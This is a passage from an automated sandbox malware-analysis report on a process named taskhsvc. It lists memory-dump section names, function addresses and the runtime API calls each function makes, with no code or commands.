    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BF7B1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002BF99F
      • Part of subcall function 00324AEC: strftime.MSVCRT ref: 00324B34
      • Part of subcall function 00324AEC: __stack_chk_fail.LIBSSP-0 ref: 00324B45
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strlen.MSVCRT ref: 002BF845
    • strerror.MSVCRT ref: 002BF878
    • strlen.MSVCRT ref: 002BF8B5
      • Part of subcall function 00316B7E: _lseek.MSVCRT ref: 00316BAF
      • Part of subcall function 00316B7E: __stack_chk_fail.LIBSSP-0 ref: 00316BBD
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
    • strerror.MSVCRT ref: 002BF93C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031683A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 003168C0
    • _lseek.MSVCRT ref: 00316919
    • strerror.MSVCRT ref: 00316972
    • _close.MSVCRT ref: 003169B7
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • __stack_chk_fail.LIBSSP-0 ref: 003169FB
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DE0B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100
    APIs
    • abort.MSVCRT ref: 001DE10A
      • Part of subcall function 001DCFEC: abort.MSVCRT ref: 001DD04F
      • Part of subcall function 001DCFEC: __stack_chk_fail.LIBSSP-0 ref: 001DD062
      • Part of subcall function 001DC6B8: __stack_chk_fail.LIBSSP-0 ref: 001DC6EB
    • abort.MSVCRT ref: 001DE17C
    • abort.MSVCRT ref: 001DE1BB
    • __stack_chk_fail.LIBSSP-0 ref: 001DE24C
      • Part of subcall function 001DC72F: __stack_chk_fail.LIBSSP-0 ref: 001DC77E
      • Part of subcall function 001DB024: __stack_chk_fail.LIBSSP-0 ref: 001DB059
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E488E, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98
    APIs
    • send.WS2_32 ref: 001E48F4
    • abort.MSVCRT ref: 001E49F5
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E3B5E: abort.MSVCRT ref: 001E3BBD
      • Part of subcall function 001E3B5E: abort.MSVCRT ref: 001E3C00
      • Part of subcall function 001E3B5E: __stack_chk_fail.LIBSSP-0 ref: 001E3CB8
    • __stack_chk_fail.LIBSSP-0 ref: 001E4A08
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002875C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
    APIs
    • time.MSVCRT ref: 002875F0
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • abort.MSVCRT ref: 00287690
    • __stack_chk_fail.LIBSSP-0 ref: 00287724
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • abort.MSVCRT ref: 002876E2
    • event_add.LIBEVENT-2-0-5 ref: 00287713
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031B05F, Relevance: 9.1, APIs: 6, Instructions: 148
    APIs
    • abort.MSVCRT ref: 0031B0D5
    • __stack_chk_fail.LIBSSP-0 ref: 0031B24B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031B114
    • strlen.MSVCRT ref: 0031B140
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memcpy.MSVCRT ref: 0031B1E5
    • memcpy.MSVCRT ref: 0031B215
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
